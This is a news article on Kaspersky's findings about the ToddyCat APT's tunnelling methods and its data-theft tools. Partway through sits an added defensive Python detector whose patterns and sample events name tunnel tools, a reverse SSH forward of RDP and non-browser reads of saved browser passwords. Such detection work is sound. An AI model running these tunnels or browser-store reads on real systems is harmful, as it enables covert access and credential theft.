ToddyCat APT is stealing data on an ‘industrial scale’

An APT (Advanced Persistent Threat) group known as ToddyCat is collecting data on an industrial scale from government and defense targets in the Asia-Pacific region.

Kaspersky researchers tracking the campaign described this week how the threat actor uses multiple simultaneous connections into victims’ environments to maintain persistence and steal data. They also discovered a number of new tools that ToddyCat (the name is a common name for the Asian palm civet) is using to collect data from victims’ systems and browsers.

Multiple traffic tunnels in ToddyCat cyber attacks

“Having different tunnels to the infected infrastructure implemented with different tools allows [the] attackers to maintain access to the systems even if one of the tunnels is discovered and eliminated,” security researchers from Kaspersky said in a blog post this week. “By ensuring constant access to infrastructure, [the] attackers are able to perform reconnaissance and connect to remote hosts.”

ToddyCat is a likely Chinese-speaking threat actor that Kaspersky has been able to link to attacks dating back to at least December 2020. In its early stages, the group appeared to be focused on only a small number of organizations in Taiwan and Vietnam. But the threat actor quickly escalated the attacks after the public disclosure of the so-called ProxyLogon vulnerability in Microsoft Exchange Server in February 2021. Kaspersky believes that ToddyCat may have been among a group of threat actors targeting ProxyLogon vulnerabilities even before February 2021, but says it has yet to find evidence to support that conjecture.

In 2022, Kaspersky reported finding ToddyCat actors using two new sophisticated malware tools, dubbed Samurai and Ninja, alongside China Chopper, a popular web shell used in Microsoft Exchange Server attacks, on systems belonging to victims in Asia and Europe.

Persistent access maintenance, fresh malware

Kaspersky’s latest investigation into ToddyCat’s activities showed that the threat actor’s tactic for maintaining persistent remote access to a compromised network is to establish multiple tunnels into it using different tools. These include a reverse SSH tunnel to reach remote network services; SoftEther VPN, an open source tool that supports VPN connections over OpenVPN, L2TP/IPsec, and other protocols; and a lightweight agent (Ngrok) that redirects command-and-control traffic from attacker-controlled cloud infrastructure to hosts in the victim’s environment.

Furthermore, Kaspersky researchers found that ToddyCat’s operators use a fast reverse proxy (FRP) client to allow access from the Internet to servers that sit behind a firewall or a Network Address Translation (NAT) device.

Kaspersky’s investigation also showed that the threat actor uses at least three new tools in its data collection campaign. One is malware that Kaspersky has dubbed “Cuthead”, which lets ToddyCat search the victim’s network for files with specific extensions or keywords and store them in an archive.

Another new tool Kaspersky found ToddyCat using is “WAExp”. Its job is to find and collect browser data belonging to the web version of WhatsApp.

“For users of the WhatsApp web app, the browser’s local storage contains profile details, chat data, phone numbers of users they chat with, and current session data,” Kaspersky researchers said. WAExp gives attackers access to this data by copying the browser’s local storage files, the security vendor noted.

The third tool meanwhile is called “TomBerBil” and allows ToddyCat actors to steal passwords from Chrome and Edge browsers.
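The tunnelling tools described above (reverse SSH, SoftEther VPN, Ngrok, FRP) and the browser-store collectors (WAExp reading WhatsApp Web’s local storage, TomBerBil reading saved Chrome and Edge passwords) both leave host-level traces a defender can look for. The following is an added example written for this article, not code from Kaspersky or from the ToddyCat toolset: a small detector that scans endpoint events for tunnel-tool executions, reverse SSH port forwards, and non-browser processes touching browser profile stores. The event line format, the sample events, the executable names (`vpnclient.exe` and `vpncmd.exe` for SoftEther, `frpc.exe` for FRP) and the path patterns are all assumptions of this example and would be tuned to a real telemetry source such as Sysmon.

```python
"""Added example: detect ToddyCat-style tunnelling and browser-store access
in constructed endpoint events. Not Kaspersky's or the actor's code."""
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Event:
    kind: str      # "process" (process creation) or "file" (file read/open)
    image: str     # full path of the acting process
    cmdline: str   # command line; process events only
    target: str    # file path touched; file events only


# Tunnelling tools named in the report, by executable name (assumed names;
# SoftEther ships vpnclient.exe / vpncmd.exe, FRP's client is frpc.exe).
TUNNEL_IMAGES = {"ngrok.exe", "frpc.exe", "vpnclient.exe", "vpncmd.exe"}

# A reverse SSH tunnel is an ssh invocation with -R (remote port forward).
SSH_REVERSE_RE = re.compile(r"\bssh(\.exe)?\b.*\s-R\s", re.IGNORECASE)

# Chrome/Edge profile artefacts: Local Storage leveldb (WhatsApp Web session
# and chat data) and Login Data (saved passwords). Pattern is an assumption.
BROWSER_STORE_RE = re.compile(
    r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\.*"
    r"\\(Local Storage\\leveldb|Login Data)",
    re.IGNORECASE,
)
# The browsers themselves legitimately read their own stores.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe"}


def parse_event(line: str) -> Event:
    """Parse a constructed 'key=value|key=value' event line."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return Event(
        kind=fields["kind"],
        image=fields.get("image", ""),
        cmdline=fields.get("cmdline", ""),
        target=fields.get("target", ""),
    )


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: Event) -> Optional[str]:
    """Return an alert label for a suspicious event, or None."""
    name = basename(ev.image)
    if ev.kind == "process":
        if name in TUNNEL_IMAGES:
            return f"tunnel-tool:{name}"
        if SSH_REVERSE_RE.search(ev.cmdline):
            return "reverse-ssh-tunnel"
    elif ev.kind == "file":
        if BROWSER_STORE_RE.search(ev.target) and name not in BROWSER_IMAGES:
            return f"browser-store-access:{name}"
    return None


def scan(lines: List[str]) -> List[str]:
    """Run classify() over event lines and collect the alert labels."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        label = classify(parse_event(line))
        if label:
            alerts.append(label)
    return alerts


# Constructed sample telemetry (not real logs). One legitimate ssh local
# forward and one svchost line are included as benign controls.
SAMPLE_EVENTS = [
    r"kind=process|image=C:\Windows\System32\OpenSSH\ssh.exe|cmdline=ssh.exe -N -R 8443:127.0.0.1:3389 -p 443 ops@203.0.113.10",
    r"kind=process|image=C:\ProgramData\ngrok.exe|cmdline=ngrok.exe tcp 3389",
    r"kind=process|image=C:\Users\Public\frpc.exe|cmdline=frpc.exe -c frpc.ini",
    r"kind=process|image=C:\Windows\System32\svchost.exe|cmdline=svchost.exe -k netsvcs",
    r"kind=file|image=C:\Program Files\Google\Chrome\Application\chrome.exe|target=C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log",
    r"kind=file|image=C:\Users\Public\wa.exe|target=C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log",
    r"kind=file|image=C:\Users\Public\tb.exe|target=C:\Users\alice\AppData\Local\Microsoft\Edge\User Data\Default\Login Data",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Matching on executable names is only a starting point: operators routinely rename tunnelling binaries, so in production pair the name check with file hashes, code-signer identity, or command-line signatures (the `-R` check above is one such signature, and survives a renamed `ssh.exe`). The browser-store rule is the more durable of the two, since any collector that copies `Local Storage\leveldb` or `Login Data` must open those files from a process that is not the browser.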

“We have examined several tools that allow attackers to maintain access to targeted infrastructure and automatically search and collect data of interest,” Kaspersky said. “Attackers actively use techniques to bypass defenses in an attempt to disguise their presence on the system.”

The security vendor recommends that organizations block the IP addresses of cloud services that provide traffic tunneling and limit the tools that administrators can use to access hosts remotely. Organizations should also remove or closely monitor any unused remote access tools in the environment and encourage users not to store passwords in their browsers, Kaspersky said.
